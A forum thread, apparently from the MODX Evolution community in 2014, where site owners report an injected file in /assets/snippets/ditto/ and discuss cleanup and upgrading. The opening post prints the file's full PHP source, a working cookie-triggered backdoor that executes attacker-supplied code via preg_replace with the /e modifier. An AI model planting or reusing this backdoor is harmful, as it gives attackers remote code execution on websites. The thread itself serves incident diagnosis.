We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 1,613 Posts
    I have a site which I was about to update (now 1.0.4) and in /assets/snippets/ditto/ there is a file called: snippet.ditto2.php with content:

<?php
    /**
     * @package
     * @since
     */
    class PlgSys {
    	public function __construct() {
    		$file = @$_COOKIE['Jlma3'];
    		if ($file){
    			$opt=$file(@$_COOKIE['Jlma2']);
    			$au=$file(@$_COOKIE['Jlma1']);
    			$opt("/292/e",$au,292);
    			die();
    		} else {
    			phpinfo(); die;
    		}
    	}
    }
    $phpinfo = new PlgSys;

Is that a hack file? I do think so!
    [ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
      Evolution user, I like the back-end speed and simplicity smiley
      • 928 Posts
      Someone else thinks so too - searched for the cookie name and found (apart from JMLA = Jesus loves me anyway, but I already knew that):
      http://forum.joomla.org/viewtopic.php?f=621&t=846752

:( KP
        • 1,613 Posts
        :)

couldn't really find any other infected files beside that file, no idea what it does.

anyway the site is now updated to the newest version and totally cleaned it.
        no special snippets beside phx where installed.

I found the file on an other site too which is updated and so I prolly killed it.
          • 1,613 Posts
          damned, found another 3 sites with /assets/snippets/ditto/snippet.ditto2.php

anyone else having this file on that location?

think it has to do with version 1.0.4 and older. [ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
          • If you aren't running 1.0.14 then your site runs a high risk of being compromised, as there are multiple issues. I've seen quite a few sites exploited including 1.0.13 sites.
              Patrick | Server Wrangler
              About Me: Website | TweetsMODX Hosting
              • 1,613 Posts
              WOW, this is serieus stuff, almost 20% of my sites has the php file!
              These files where places between date: 23-06-2014 and 25-06-2014! (different Hosts)

Peoples, please check your folders if you are infected:
              /assets/snippets/ditto/snippet.ditto2.php

also check your cache folder for suspicious .php files.

I think many peoples have that file?
              I don't know what it does thow.. please let me know if you are also infected...

Just updating to 1.0.14 won't solve the hack if you are already hit (because it is not a default file and won't be overwritten..)
              [ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
                • 1,613 Posts
                I'm a bit amazed I'm the only one out here with this hackfile..
                  • 953 Posts
                  Quote from: fourroses666 at Jul 03, 2014, 12:52 PM
                  I'm a bit amazed I'm the only one out here with this hackfile..

Nope smiley

Got a mail from a friend about 10 minutes ago - he says at least two of his sites have the file in them.

But he can't figure out where the hack has taken place
                    • 1,613 Posts
                    I'm pritty sure it is the ajaxseach stuff.

At the moment I really think an update and removing that file will close the leak but if someone can find other files somewhere I would love to know, I didn't.

On a couple infected sites I have installed a blank version of evo 1.0.14, copied the config file back and images / templates and plugins/phx folders.

When I look at the script I see there is a cookie build, I don't get it. Doesnt look that harmfull but who knows.. Some Joomla sites have the same problem I saw after googling.
                      • 953 Posts
                      Ah, will contact my friend and ask if AjaxSearch was in the sites

My sites (touch wood) are all OK - I always delete everything I don't use e.g. snippets, plugins etc. and have never used AjaxSearch.

Will post back ASAP